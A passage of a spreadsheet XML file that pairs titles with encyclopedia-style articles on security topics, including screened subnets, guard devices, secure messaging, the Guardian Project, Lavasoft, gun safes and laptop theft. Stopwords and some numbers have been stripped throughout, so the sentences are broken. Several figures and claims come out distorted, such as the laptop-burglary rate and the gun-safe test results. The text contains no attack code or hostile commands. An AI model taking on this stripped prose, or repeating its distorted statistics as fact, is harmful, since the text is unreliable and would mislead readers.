systems operated enemies, trade knowledge vulnerability third party profit, typically attack enemies. researchers practicing disclosure generally concerned improving security protecting networks. however, proponents argue simply want assist vendors, claim intent harm others. while full coordinated disclosure advocates declare similar goals motivations, simply disagreeing best achieve them, disclosure entirely incompatible. references</t>
  </si>
  <si>
    <t>Screened subnet</t>
  </si>
  <si>
    <t>network security screened subnet refers logical screening routers firewall define three separate subnets: external router (sometimes called access router), separates external network perimeter network, internal router (sometimes called choke router) separates perimeter network internal network. perimeter network, also called border network demilitarized zone (dmz), intended hosting servers (sometimes called bastion hosts) accessible access internal external networks. purpose screened subnet establish network heightened security situated external presumed hostile network, internet extranet, internal network. screened subnet essential concept e-commerce entity presence world wide using electronic payment systems network services prevalence hackers, advanced persistent threats, computer worms, botnets, threats networked information systems. physical separation routers separating firewall system separate component routers achieves greater potential throughput reducing computational load router. component router screened subnet firewall needs implement general task, router less complex configuration. screened subnet also achieved single firewall device three network interfaces. relationship term demilitarized zone military context refers area treaties agreements contending groups forbid military installations activities, often along established frontier boundary military powers alliances. similarity network security screened network (dmz) reduced fortifications intended points ingress external network presumed hostile. appears term demilitarized zone (dmz) popularized sales marketing term sometime development screened routers firewalls. often used synonym different meaning. "there number terms used, bastion hosts, screened subnets, dmz, perimeter networks confusing, especially used together." "another term often causes confusion (demilitarized zone), opposed screened subnet. true network contains hosts accessible internet exterior, boarder, router them. these hosts protected screening router." screened subnet also collection hosts subnet, located behind screening router. term used vendor mean either, best verify mean." comparison screened host firewall architecture whereas screened subnet firewall employs screened routers create three subnets, screened host firewall employs screened router define subnets: external network internal network. screened subnet firewall secure intruder must traverse filtered routes reach internal network. bastion host compromised intruder must still bypass second filtered route reach internal network hosts. also (computing) firewall (networking) multitier architecture references</t>
  </si>
  <si>
    <t>Guard (information security)</t>
  </si>
  <si>
    <t>information security, guard device system allowing computers otherwise separate networks communicate, subject configured constraints. many respects guard like firewall guards similar functionality gateway. whereas firewall designed limit traffic certain services, guard aims control information exchange network communication supporting business level. further, unlike firewall guard provides assurance effective providing control even attack failure conditions. guard typically protected network external network, ensure protected network safe threats posed external network leaks sensitive information external network. guard usually dual-homed, though guards connect networks, acts full application layer proxy, engaging separate communications interface. guard pass business information carried protocols network another, information passes configured checks provide required protection. history development guards began late 1970s creation several "secure communications processors" "guard" applications. secure communications processors high assurance operating systems security kernels developed support controlled plain-text bypasses packet network encryption devices. guard applications designed sanitise data exported classified system remove sensitive information honeywell secure communications processor (scomp) early guard platform. this evaluated computer security center orange book evaluation criteria level rsre secure user environment (sue) pdp-11/34. simple separation kernel designed constructed division royal signals radar establishment (rsre) malvern, england.the advanced command control architectural testbed (accat) guard developed export email classified system human review stage.later developments guards addressed problem automatic "downgrading" information exported classified system. secure network server (sns) mail guard (smg) enforced source/destination address whitelists, security label checks, attachment type filtering digital signatures ensure sensitive information releasedfirewalls later development, arriving around 1987. over time functionality firewalls increased provide similar capabilities guards. main difference remaining guards built provide assurance effective protecting network themselves. swipsy firewall toolkit developed defence evaluation research agency general guard platform. swipsy layered trusted solaris functionality guards initially designed control release information classified systems, protecting confidentiality sensitive information handled protected system. since scope extended cover controls import data, order protect integrity information availability services protected network. guards generally provide following functionality: source destination address authentication source destination address whitelisting security label checks source destination clearances data format whitelisting data format consistency validity checking scanning data known malware validation digital signatures inspection encrypted content checking text blacklist phrases removal redundant data generation logs recording security relevant events self-test mechanisms assurance guards functionally equivalent bastion host acting application proxy placed within network, proxy imposes necessary controls data exchanged provide protection external threats internal leaks. distinguished constructed. network relies outer packet filtering firewalls route traffic bastion host. firewalls function incorrectly pass traffic without passing bastion host, checks imposed proxies bypassed. also, networking stack bastion host behaves incorrectly route traffic without passing proxies. guard constructed software needs function correctly minimised work needed demonstrate third party also minimised. that guards engineered provide assurance apply appropriate checks.guards trusted operating system separate security critical checker components less critical protocol handling components. failure protocol handling components cannot cause data bypass checker. example, security-enhanced linux used nexor guards solaris trusted extensions used radiant mercury isse guard, deep-secure. type enforcement controls developed lock operating system used sidewinder.guards also physically separate computers ensure critical components bypassed. products government-off-the-shelf products: radiant mercury isse guardcommercial-off-the-shelf products: rockwell collins guards (rockwell collins) deep-secure mail guard (deep-secure) nexor (nexor) raytheon high speed guard (raytheon) sdot security gateway (infodas) standard automated guard environment (sage) (bae systems) sybard::sentry (qinetiq) also data diode high assurance guard references</t>
  </si>
  <si>
    <t>Secure messaging</t>
  </si>
  <si>
    <t>secure messaging server-based approach protect sensitive data sent beyond corporate borders, provides compliance industry regulations hipaa, glba sox. advantages classical secure e-mail confidential authenticated exchanges started immediately internet user worldwide since requirement install software obtain distribute cryptographic keys beforehand. secure messages provide non-repudiation recipients (similar online banking) personally identified transactions logged secure email platform. functionality secure messaging works online messaging service. firstly, users enroll secure messaging platform. then, user logs account typing username password strong authentication) similar web-based email account. message center messages sent secure ssl-connection equally protecting methods recipient. recipient contacted first time message unlock code (see muc) needed authenticate recipient. alternatively, secure messaging used standard email program without installing software. secure delivery secure messaging possesses different types delivery: secured interface, s/mime encrypted communication secured connections email domains, individual email clients. single secure message sent different recipients different types secure delivery sender worry about. trust management secure messaging relies trust. this method synthesizes authentication approach trust, known pgp, advantages hierarchical structures, known centralized systems. those combined certificates provide high quality electronic identities. this approach focuses user allows immediate personal bootstrapping trust, respectively revocation. physical security traditional client-server email, message data downloaded local hard drive, vulnerable computer lost, stolen, physically accessed unauthorized person. secure messages stored network internet server typically physically secure, encrypted data inbound outbound. however, abundance data still makes server attractive target remote attacks. methods taken protect physical security include ensuring environmental safety hardware safety. course, intentions server operator also come question. application secure messaging used many business areas company-wide sensitive data exchanges. financial institutions, insurance companies, public services, health organizations, service providers rely protection secure messaging. secure messaging easily integrated corporate email infrastructures. according wolcott al., secure messaging offers potential improvements patient-provider relationships outcomes.in government context, secure messaging offer electronic registered mail functions. binding, countries, switzerland, require accredited secure platform. technical requirements there software required using secure messaging. users need valid email address working internet connection up-to-date browser. user impact with business areas one-on-one interaction secure messaging recipients also includes desire share information another party negotiating different rules across state borders. even private misuse information data, recipients continue service. this referred privacy paradox, convenience apps secure messaging important privacy concern information systems. similar technologies s/mime identity-based encryption history 1965: mainframe computer users able exchange messages. 1982: standard (d)arpa internet text messages (rfc822) adopted: different email systems communicate other. 1983: development internet protocol 1991: phil zimmermann creates 1991, first-generation secure mail communication. 1999: launch browser-based internet banking (union bank switzerland) advent strong cryptography industry standard browsers. 2001: google search engine indexes billion internet pages: cooperating sites found easily 2002: introduction strong authentication internet banking (ubs switzerland) prevent identity fraud. 2005: more billion internet users: people industrial countries reached internet also information security email authentication email encryption email privacy secure communication secure instant messaging transport layer security cryptography electronic signature certified email references</t>
  </si>
  <si>
    <t>Guardian Firewall</t>
  </si>
  <si>
    <t>guardian firewall also blocks data location trackers. network crypto suite ipsec (using ikev2). service, claims collect user information, takes form first became available june 2019.the company behind product sudo security group. founder will strafach, security researcher, (known work jailbreaking tools) chirayu patel.guardian firewall compared 2020 lockdown. references external links guardian home page</t>
  </si>
  <si>
    <t>Guardian Project (software)</t>
  </si>
  <si>
    <t>guardian project global collective software developers, designers, advocates, activists trainers develop open-source mobile security software operating system enhancements. they also create customized mobile devices help individuals communicate freely protect intrusion monitoring. effort specifically focuses users live work high-risk situations often face constant surveillance intrusion attempts mobile devices communication streams. history guardian project founded nathan freitas 2009 brooklyn, since founded, guardian project developed dozen mobile applications android million downloads hundreds thousands active users. also partnered prominent open source software projects, activists groups, ngos, commercial partners news organizations support mobile security software capabilities. november 2014, "chatsecure orbot" received score electronic frontier foundation's secure messaging scorecard, along cryptocat, textsecure, "signal redphone", silent phone, silent text. "jitsi ostel" scored points electronic frontier foundation's secure messaging scorecard. they lost point recent independent code audit.in march 2016, guardian project announced partnership f-droid copperheados goal creating solution verifiably trusted operating system, network network services, stores apps themselves". funding guardian project received funding google, berkeley macarthur foundation, avaaz, internews, open technology fund, witness, knight foundation, benetech, project free press unlimited.through work partner projects like project, commotion mesh storymaker, project received indirect funding state department (through bureau democracy, human rights labor internet freedom program) dutch ministry foreign affairs (through hivos). projects active orbot: client android. uses onion routing provide access network services blocked, censored monitored, also protecting identity user requesting resources. often orbot installed orwall, takes lead firewall required iptables rules traffic shaping order allow orbot traffic, force selected applications redirected orbot transport. instead orbot, afwall+, available f-droid google play repository, alternative choice recommended re-routing outbound traffic back local port, even iptables rules, virtual private network like openvpn. finally, netcipher developed guardian project users interested enabling apps working directly orbot (and thus orfox browser). chatsecure: instant messaging application integrated off-the-record encrypted chat protocol. formerly called gibberbot, built google's open-source talk modified support jabber xmpp protocol. obscuracam: secure camera obscure, encrypt destroy pixels within image. this project partnership witness, human rights video advocacy training organization. haven free open-source android security application designed monitor activity happening around device using built-in sensors, alert device owner activity. co-developed edward snowden auspices freedom press foundation. discontinued orfox: mobile counterpart browser. guardian project announced stable alpha orfox june 2015. orfox built fennec (firefox android) code browser code repository, given security hardening patches browser development team. some orfox build work based fennec; f-droid project. orfox, project removed webrtc component, chromecast connectivity, permissions access camera, microphone, contacts (address book), location data (gps al.), nfc. orfox supersede orweb browser project, turn superseded browser android. orweb: privacy enhanced browser supports proxies. when used orbot, orweb protects network analysis, blocks cookies, keeps local browsing history, disables flash keep user safe. ostel: tool end-to-end encrypted voip calls. this public testbed open secure telephony network (ostn) project, goal promoting free, open protocols, standards software, power end-to-end secure voice communications mobile devices, well desktop computers. this discontinued 2017. distribution guardian project offers downloads apps google play, amazon appstore, aptoide, directly website, f-droid-compatible repository. direct downloads signed verified developer's key. references external links official website</t>
  </si>
  <si>
    <t>Guardly</t>
  </si>
  <si>
    <t>guardly canadian-based security company headquarters toronto. company designs provides mobile safety security solutions enterprise organizations, campuses, municipalities. best known mobile safety application allows users connect security, public authorities list emergency contacts safety activated. guardly also attributed first company offer indoor positioning system locate users within building emergency, first offer mass notification system integrates indoor positioning data locate people need help. company's technology featured discovery channel’s future tech series. history guardly founded 2010 josh sookman, company's current ceo. prior guardly, worked blackberry partners fund venture partners. company received undisclosed amount first round seed funding september 2011, golden venture partners extreme venture partners, matching contribution federal economic development agency southern ontario (feddev ontario). guardly raised another $1.45 million january 2014 second seed funding round, freestyle capital participation golden venture partners mars investment accelerator fund.guardly founded personal security application consumers. event emergency, would notify contacts chosen user well alert authorities. september 2012 guardly began partner educational organizations implement software campus security systems campus. during quarter, guardly expanded offerings partnering companies also sold products educational market including code blue corp, manufacturer blue light phones used college campuses notify campus police various locations campus. partnership expanded upon code blue’s technological capabilities including guardly mobile safety applications endpoint report emergencies campus police. allowed campus security identify user track movements activated. guardly also partnered desire2learn 2012, presenting desire2learn's campus life mobile app.in 2013, crime prevention association toronto partnered guardly implement company's technologies neighborhood watch programs. guardly's mobile mass notification system integrated called notifeye, later launched crime prevention association toronto. january 2014 company began branch enterprise security solutions. infrastructure includes variety smartphones coupled mobile safety applications, indoor positioning system, incident management application. products services guardly provides enterprise mobile safety platform communication emergency notification. incorporates cloud, mobile, indoor positioning, real time tracking. guardly safety allows users communicate dispatch phone secure instant messaging, tracking real-time location. ability allow users connect select group contacts well authorities event emergency. contacts connected conference call instant messaging also allows location tracking activated user. guardly added indoor positioning system 2013.guardly's incident management system provides based incident management assistance dispatch personnel monitoring managing emergency situations. during incident, dispatchers speak caller phone text view photos sent users system. system configurable monitor alerts within multiple geographical regions using company’s geofencing technology routing information multiple security operation centers sites.guardly’s indoor positioning system said able show rough geographical location also transmit specific floor specific room someone emergency located. company expanded offerings mobile mass notification system. system allows mass notification 500,000 people within geotargeted area used conjunction indoor positioning system. references</t>
  </si>
  <si>
    <t>Secure operating system</t>
  </si>
  <si>
    <t>secure operating system refer security-focused operating system security-evaluated operating system, operating systems achieved certification external security-auditing organization trusted operating system, operating system provides sufficient support multilevel security evidence correctness meet particular requirements</t>
  </si>
  <si>
    <t>Lattice-based access control</t>
  </si>
  <si>
    <t>computer security, lattice-based access control (lbac) complex access control model based interaction combination objects (such resources, computers, applications) subjects (such individuals, groups organizations). type label-based mandatory access control model, lattice used define levels security object subject access subject allowed access object security level subject greater equal object. mathematically, security level access also expressed terms lattice partial order set) object subject greatest lower bound (meet) least upper bound (join) access rights. example, subjects need access object, security level defined meet levels another example, objects combined, form another object assigned security level formed join levels lbac also known label-based access control rule-based access control) restriction opposed role-based access control (rbac). lattice based access control models first formally defined denning (1976); also sandhu (1993). also references denning, dorothy (1976). lattice model secure information flow" (pdf). communications acm. (5): 236–243. doi:10.1145/360051.360056. sandhu, ravi (1993). "lattice-based access control models" (pdf). ieee computer. (11): 9–19. doi:10.1109/2.241422.</t>
  </si>
  <si>
    <t>Lavasoft</t>
  </si>
  <si>
    <t>adaware, formerly known lavasoft, software development company produces spyware malware detection software, including adaware. operates subsidiary avanquest division claranova.the company offers adaware three editions, free two, total, commercial. other adaware products include adaware block, adaware companion, lavasoft digital lock, lavasoft file shredder, lavasoft privacy toolbox lavasoft registry tuner.adaware's headquarters montreal, canada, previously located gothenburg, sweden since 2002. nicolas stark ann-christine åkerlund established company germany 1999 flagship adaware antivirus product. 2011, lavasoft acquired solaria fund, private equity fund front entrepreneurs daniel assouline michael dadoun, accused selling software available free, including adaware antivirus prior acquiring company itself. adaware antivirus anti-spyware anti-virus software program, adaware antivirus, according developer, detects removes malware, spyware adware, computer viruses, dialers, trojans, bots, rootkits, data miners,, parasites, browser hijackers tracking components. history adaware antivirus originally developed, ad-aware, 1999 highlight beacons inside internet explorer. many websites, users would tiny pixelated square next beacon, warning user computer's address non-essential information tracked website. over time, ad-aware added ability block beacons, ads. 2008 edition, lavasoft bundled ad-aware plus first time antivirus scanner, used avira engine arrangement continued years. starting ad-aware version bitdefender antivirus engine used instead. reliability according world magazine, older version ad-aware, anniversary edition, could locate 83.6% malware comparative test carried security firm av-test. however, stated tests newest version. neil rubenking pcmag performed test version 8.3, ad-aware scored points, beating previous score 9.1. market share july 2013, adaware antivirus free listed downloaded total million times lavasoft site, including million times download.com december 2014. according opswat, january 2015, ad-aware less market share globally. paid versions product competed low-cost free products, microsoft security essentials. controversies company acquired january 2011, lavasoft, solaria fund, private equity fund, front daniel assouline michael dadoun, people upclick interactive brands. magazine reported lavasoft acquired entrepreneurs accused selling software available free unwitting users guise premium support, including free version lavasoft's security program prior acquiring company itself. security consultant dancho danchev documented controversy.additionally, danchev reported 2013 lavasoft used hide hard-to-uninstall programs third-party software trick users installing them, like k-lite codec pack, lavasoft companion changed browser without user's permission. although company shields behind complete legality bundled software claims software used fight malware, users branded products malware.in february 2015, reported cert coordination center, security feature ad-aware companion implemented komodia digestor, komodia's public sdks, company behind superfish security incident lenovo machines. references external links official website</t>
  </si>
  <si>
    <t>Gun safe</t>
  </si>
  <si>
    <t>safe safe designed storing firearms and/or ammunitions. safes primarily used prevent access unauthorized unqualified persons (such children), burglary protection and, capable safes, protect contents damage flood, fire natural disasters. access prevention firearms mandated many places, necessitating lock, locked cabinet safe, even dedicated vault room security alarms. reinforced metal safes largely replaced cabinets made fine stained wood etched glass fronts used display commonly used decades ago, although safes made resemble cabinets. features safes include additional security features fire water protection, combination lock, digital lock, fingerprint identification.electronic locks well mechanical locks available many models safes. highest reliability exists mechanical locks, although often time consuming open electronic locks. some mechanical combination locks locks, too, lock combination lock dial turning, thereby precluding casual attempts anyone physical access safe trying multiple combinations hopes unlocking safe. some safes live locking bolt technology resistant metal ensure secure protection contents forced entry. some safes provide protection smash grab burglary unwanted access young family members home outside, safes provide additional protection fire flood natural disasters.vault doors available creating walk-in safes vaults dedicated room armory one's home. such rooms also sometimes used dual-use safe panic room, even dedicated shelter case tornado hurricane. safes carved wood exterior (furniture safes) serve primarily decorative purpose resemble cabinets used displaying weapons past. design characteristics include wood veneer thick tempered glass. some safes designed hidden obvious view. false walls hinges located closets also sometimes used hide safes, although simply installing safe existing closet door closes achieve much advantages prevent intruders becoming aware existence safe. depending place stored, different types safes appeared: bed, bedside, in-wall, vehicle, cabinets, drawers, mirror, nightstand. particularly handgun safes found various locksmiths independent researchers unfit firearm storage best avoided. safes various countries australia australian states require firearms must locked steel cabinets safes, although wooden safes "deemed easily penetrable" allowed category weapons states, apart western australia. states, states ammunition (and bolt readily removed), must stored either separate safe separately locked section safe. legal requirement safe fastened wall floor (with exceptions states safes mass greater lb). addition, shooters western australia must double locks safes swinging edge door greater less 1,500 in), additional locks required safes swinging edge greater 1500 police visit inspect storage facility issuing license, make random checks ensure legislation complied with. sporting shooters association australia endorses policy "secure gun, secure sport" campaign increase compliance firearm safety prevent theft. requirements vary transporting firearms vehicles different states. most require hidden view, locked easily reached unauthorised person. firearms must unloaded ammunition transported another section car. canada safe vault, cabinet, container room difficult break into. sheet metal commercial safe, locked metal container preservation valuables fits description “safe” black’s dictionary. safe storage conditions increase severity non-restricted class restricted class prohibited classes. firearm must either trigger locked, bolt removed, must stored secure locked container, receptacle room. restricted prohibited firearm must inoperable means keyed trigger locking device. full-automatic firearm must disassembled remove bolt bolt carrier, must physically separated rest pieces. ireland person applying renewing licence ireland must safe installed home. this made firearms (secure accommodation) regulations 2009. safes must tested british standard bs7558. additional requirements including monitored alarms necessary guns. united kingdom many safes sold tested bs7558/92, british standard safes. british home office recommends cabinets conform standard. glass fronted cabinets legal u.k, provided security glazing comply bs5544 requirements weak spots full steel cabinet.if citizens safe, according 'secure storage', acceptable remove firing mechanism firearm store secure container. required lock away rest firearm. united states some safes united states tested underwriters laboratories (ul). least rigorous certification safes specified standard 1037 residential security container (rsc). certification requires safe resist five minutes expert attacks employing tools including screwdrivers, adjustable wrenches, bars, punches, chisels hammers heavier lb.many safe manufacturers state safe "doj approved". state california department justice (doj) required safe sold california approved regulatory safe standards. this standard become common rating classification safes. however, 2012, report appeared forbes written investigative attorney physical security specialist marc weber tobias, presenting results investigation quality security provided eleven different models among three leading brands safes sold u.s. many retail outlets. eight models brands said conform standard. tobias reported colleagues found eleven models could opened variety simple implements techniques, including bouncing rapping, insertion paperclips, wires, drinking straws, screwdrivers, brass strips purchased hardware store. four models unlocked three-year-old child. fatality resulting occurrence investigation.) when tobias reported findings manufacturers retailers "safes", useful dialog corrective action resulted. tobias concluded "standards woefully inadequate address issues found safes tested. standards cover method entry, meaningless."fireproof safes classification, depending build safe, inside must warmer certain temperature certain period time. common rating safes "350-1 hour" "350-2 hour", means safe fire, inside warmer degrees fahrenheit hours. noted fireproof safes insecure unauthorized entry. potential risk although rare, large safes pose risk small children could accidentally lock inside one. minimize risk, safes usually bolted down, deter crime, well eliminate possibility safe tipping upon person opening door; heaviest portion many safes door. advised safe installed place little risk fire, humid little risk theft. humidity also poses risk life guns safe, prevented dehumidifier, avoid moisture. also firearm rack safety safe references</t>
  </si>
  <si>
    <t>H.234</t>
  </si>
  <si>
    <t>cryptography, h.234 international standard defines popular encryption systems used secure communications, specifically diffie-hellman exchange rsa. also defines 8732 management. history h.234 first defined international telecommunications union's standardization sector (itu-t) 1994 study group subsequently, standard revised study group november 2002, remains force date. time first publication h.234, covered patent united states (but elsewhere), patent expired 2000. specification standard describes three methods encryption management: diffie-hellman 8732 references</t>
  </si>
  <si>
    <t>Lastline</t>
  </si>
  <si>
    <t>lastline, inc. american cyber security company breach detection platform provider based redwood city, california. company offers network-based security breach detection security services combat malware used advanced persistent threat (apt) groups businesses, government organizations security service providers. lastline offices north america, europe, asia. history lastline founded 2011 university california, santa barbara northeastern university researchers engin kirda, christopher kruegel giovanni vigna. 2014, watchguard technologies, inc. joined lastline defense program combat advanced malware targeting businesses providing primary functionality blocking, available unified threat management (utm) next generation firewall (ngfw) products. watchguard utilizes lastline's next generation cloud-based sandbox, powered full-system emulation, inspects objects unknown malware crafted evade detection.lastline featured 2014 conference francisco. that year, giovanni vigna, lastline, appeared cyber security expo keynote presentation analyzed evasive malware techniques.juniper networks began integrating lastline expand capability spotlight secure platform 2014. february 2015, lastline announced partnership technology integration carbon black effort facilitate automated comprehensive end-to-end endpoint network security email, web, files mobile applications. funding 2013, lastline raised million funding venture capital firms redpoint ventures e.ventures. redpoint ventures series round million investment, existing investor e.ventures provided remainder. 2014, lastline raised million investors dell ventures presidio ventures, well existing investors redpoint ventures e.ventures. with round funding, lastline continue focus serving growing global enterprise customer base well existing partnerships improve information security threat intelligence worldwide. this round funding adds $13.7 million raised earlier rounds bring total funding raised nearly million since company's founding 2011.on june 2020 lastline announced entered definitive agreement acquired vmware. acquisition expected finalized july 2020. offerings lastline breach detection platform provides businesses automated detection active data breaches. lastline knowledge base (llkb) allows access information regarding historical data breach events, related addresses, indicators compromise (iocs) malware linked advanced threat incident. lastline labs from 2013 2014 lastline researchers studied hundreds thousands malware samples, testing malware vendors’ signatures featured virustotal determine caught malware samples, quickly. they found that, given day, least half scanners tested failed detect malware months, third scanners still detecting also artificial intelligence computer security countermeasure (computer) risk machine learning malware network behavior anomaly detection threat (computer) references external links official website</t>
  </si>
  <si>
    <t>HAZUS</t>
  </si>
  <si>
    <t>hazus geographic information system-based natural hazard analysis tool developed freely distributed federal emergency management agency (fema). 1997 fema released first edition commercial off-the-shelf loss risk assessment software package built technology. this product termed hazus97. current version hazus-mh (where stands 'multi-hazard') released 2017. currently, hazus model multiple types hazards: flooding, hurricanes, coastal surge, tsunamis, earthquakes. model estimates risk three steps. first, calculates exposure selected area. second, characterizes level intensity hazard affecting exposed area. lastly, uses exposed area hazard calculate potential losses terms economic losses, structural damage, etc. although developed continent focus, hazus toolset adopted emergency management organizations worldwide singapore, canada, australia, pakistan. description nationally applicable standardized methodology contains models estimating potential losses earthquakes, floods hurricanes. hazus uses geographic information systems (gis) technology estimate physical, economic social impacts disasters. graphically illustrates limits identified high-risk locations earthquake, hurricane floods. users visualize spatial relationships populations permanently fixed geographic assets resources specific hazard modeled, crucial function pre-disaster planning process. hazus used mitigation recovery, well preparedness response. government planners, specialists emergency managers hazus determine losses beneficial mitigation approaches take minimize them. hazus used assessment step mitigation planning process, foundation community's long-term strategy reduce disaster losses break cycle disaster damage, reconstruction repeated damage. being ready helps recovery natural disaster. number hazus users continues increase, types uses. increasingly, hazus used states communities support risk assessments perform economic loss scenarios certain natural hazards rapid needs assessments hurricane response. other communities using hazus increase hazard awareness. successful uses hazus profiled mitigation recovery preparedness response. emergency managers also found templates helpful support rapid impact assessment disaster response. requirements although hazus-mh free, requires users arcgis arcview license level. addition, arcgis spatial analyst extension required flood model. furthermore, currently available arcgis version 10.4 (current version 10.6). part major effort modernize hazus, number updates progress. late 2014, update released bring hazus compatibility arcgis 10.2.2 windows later hazus modernization process, functional enhancements implemented flood module, underlying code hazus re-designed align current practices, enabling future development. advanced analysis mapping results advanced engineering building module (aebm) earthquake hazards salt lake community. user community hazus substantial user group community includes hazus linkedin group several hazus user groups across nation "providing network hazus users, promoting supporting application fema hazus software disaster mitigation, planning, response recovery. this group supported hazus.org independent on-line voice hazus user community ultimate resource everything hazus". reach includes user groups managed user group leaders, "hazus user groups (hugs) provide network public private sector organizations industry partnerships collaborate disseminate hazus information data throughout nation. hazus user group members include emergency managers, geospatial information system (gis) specialists, geologists, state local planners, consultants stakeholders hazus software risk assessment activities.". each hazus user group conducts training, holds seminars, occasionally holds group-wide user group conference calls. references external links fema hazus website usehazus hazus space hazus website hazus linkedin</t>
  </si>
  <si>
    <t>Secure signature creation device</t>
  </si>
  <si>
    <t>secure signature creation device (sscd) specific type computer hardware software used creating electronic signature. service secure signature creation device, device must meet rigorous requirements laid annex regulation (eu) 910/2014 (eidas), referred qualified (electronic) signature creation device (qscd). using secure signature creation devices helps facilitating online business processes save time money transactions made within public private sectors. description minimum requirements must elevate electronic signature creation device level secure signature creation device provided annex eidas. through appropriate procedural technical means, device must reasonably assure confidentiality data used create electronic signature. must ensure data used create electronic signature unique used once. lastly shall allow qualified trust service provider certificate authority create manage signatory’s electronic signature data.to ensure security, signature creation data used sscd create electronic signature must provide reasonable protection current technology prevent forgery duplication signature. creation data must remain sole control signatory prevent unauthorized use. sscd prohibited altering signature’s accompanying data.when trust service provider certificate authority places sscd service, must securely prepare device according annex eidas fully compliance following three conditions: while storage, sscd must remain secure. further, reactivation deactivation sscd must occur secure conditions. user activation data, include codes delivered separately sscd prepared securely. international security assurance requirements sscds secure signature creation device must also meet international standard computer security certification, referred common criteria information technology security evaluation (iso/iec 15408). this standard gives computer system users ability specify security requirements protection profiles (pps) security functional requirements (sfrs) security assurance requirements (sars). trust service provider certificate authority required implement specified requirements attest product’s security attributes. third-party testing laboratory evaluates device ensure level security claimed provider. central authentication service when secure signature creation device used part central authentication service (cas), server multi-tier authentication scenarios. software protocol allows users authenticated signing application. common scheme protocol includes client’s browser, application requesting authentication server. when authentication needed, application send request server. server compare user’s credentials database. information matches, respond user authenticated. legal implications regarding secure signature creation devices eidas provided tiered approach determining legal implications electronic signatures. signature created secure signature creation device considered strongest probative value. document message signed device non-reputable, meaning signatory cannot deny responsible creation signature.regulation (eu) 910/2014 (eidas) evolved directive 1999/93/ec, electronic signatures directive. intent directive make member states responsible creating legislation would allow creation european union’s electronic signing system. eidas regulation required member states follow specifications electronic signatures effective date july 2016. references external links www.iso.org/iso 22715:2006 www.eur-lex.europe.eu/eidas</t>
  </si>
  <si>
    <t>Secure state</t>
  </si>
  <si>
    <t>secure state information systems security term describe entities computer system divided subjects objects, formally proven state transition preserves security moving secure state another secure state. thereby inductively proven system secure. defined bell–lapadula model, secure state built concept state machine allowable states system. transition state another state defined transition functions. system state defined "secure" permitted access modes subjects objects accordance security policy. also bell–lapadula model tcsec orange book references</t>
  </si>
  <si>
    <t>Laptop theft</t>
  </si>
  <si>
    <t>laptop theft significant threat users laptop netbook computers. many methods protect data prevent theft developed, including alarms, laptop locks, visual deterrents stickers labels. victims laptop theft lose hardware, software, essential data backed thieves also access sensitive data personal information. some systems authorize access based credentials stored laptop including addresses, cookies, cryptographic keys stored passwords. according fbi, losses laptop theft totaled $3.5 million 2005. computer security institute/fbi computer crime security survey found average theft laptop cost company $31,975. study surveying private public organizations published intel 2010, 7.1% employee laptops lost stolen usefulness lifespan. furthermore, determined average total negative economic impact stolen laptop $49,256—primarily compromised data, efforts retroactively protect organizations people potential consequences compromised data. total cost lost laptops organizations involved study estimated $2.1 billion. $48b lost u.s. economy result data breaches, resulted stolen laptops portable devices.in 2011, bureau brief prepared bureau crime statistics research reported thefts laptops increase last years, attributed part increase ownership also attractive proposition thieves opportunists. 2001 2,907 laptops stolen south wales dwellings, 2010 risen 6,492, second cash items taken thieves. bureau reports four break-ins 2010 resulted laptop stolen. this startling trend burglaries lends increase identity theft fraud personal financial information commonly found laptops. these statistics take account unreported losses figures could arguably much higher.businesses much lose unencrypted poorly secured laptop misappropriated, many adequately assess risk take appropriate action. loss sensitive company information significant risk businesses measures taken adequately protect data. survey conducted multiple countries suggested employees often careless deliberately circumvent security procedures, leads loss laptop. according survey, employees likely lose laptop travelling hotels, airports, rental cars, conference events.behling wood examined issue laptop security theft. their survey employees southern england highlighted security measures fundamentally basic training employees security measures limited inadequate. 100% surveyed employees access company information laptop remote sites included homes. authorized store company data laptop. businesses provide security training.they concluded trends laptop thefts needed monitored assess intervention measures required. inside protection passwords longer adequate protect laptops. there many solutions improve strength laptop's protection. full disk encryption (fde) increasingly popular cost-effective approach. full disk encryption taken software-based approach, hardware-based approach, both-end-based approach. provides protection operating system starts pre-boot authentication, however precautions still need taken cold boot attacks. there number tools available, commercial open source enable user circumvent passwords windows, linux. example truecrypt allows users create virtual encrypted disk computer.passwords provide basic security measure files stored laptop, though combined disk encryption software reliably protect data unauthorized access. remote laptop security (rls) available confidently secure data even laptop owner's possession. with remote laptop security, owner laptop deny access rights stolen laptop computer internet access. physical protection number computer security measures emerged protecting data. kensington security slot along locking cable provides physical security thefts opportunity. this cord attached something heavy cannot moved, locked case laptop, 100% secure.the noble security lock slot different attach security cable. centralization laptop data another possible approach limiting consequences laptop theft issue thin client devices field employees instead conventional laptops, data reside server therefore less liable loss compromise. thin client lost stolen, easily inexpensively replaced. however, thin client depends network access server, available aboard airliners location without network access. this approach coupled strong authentication single sign-on (sso). major laptop thefts 2006 laptop custody data analyst stolen contained personal health data 26.5 million active duty troops veterans. agency estimated cost $100 million $500 million prevent cover possible losses data theft. 2007, united states department veterans affairs agreed million current former military personnel settle class action lawsuit. 2007 financial services authority (fsa) fined uk’s largest building society, nationwide, £980,000 inadequate procedures employees’ laptop stolen domestic burglary. laptop details million customers’ names account numbers and, whilst device password protected, information unencrypted. noted systems controls fell short, given took nationwide three weeks take steps investigate content missing laptop. substantial fine invoked reinforce fsa’s commitment reducing financial crime.in 2010 reported theft laptop unidentified contractor; computer contained personally identifiable information veterans, including data medical centers' records. after learning unencrypted laptop, investigated many contractors might complying encryption requirement learned vendors refused sign contract clauses required encrypt veteran data computers, apparent violation rules. common locations lojack laptops compiled list places laptops stolen: public schools (k-12) residential properties automobiles (excluding taxis) businesses/offices universities colleges restaurants cafes hotels motels dormitory airports public transit (taxi, bus, train)to provide context, ponemon institute released study indicates 600,000 laptops lost stolen airports every year, 65-69% remaining unclaimed. also device tracking software risk pre-boot authentication prey (software) references external links tracking, prevention recovery curlie lost laptop thefts british ministry defence 2005 csi/fbi computer crime security survey statistics information computer crime</t>
  </si>
  <si>
    <t>HERAS-AF</t>
  </si>
  <si>
    <t>herasaf project herasaf well established open-source xacml implementation. provides extended implementation xacml standard. freely available, established based future driven technologies standards. references external links herasaf website oasis xacml committee website</t>
  </si>
  <si>
    <t>Gunnebo Group</t>
  </si>
  <si>
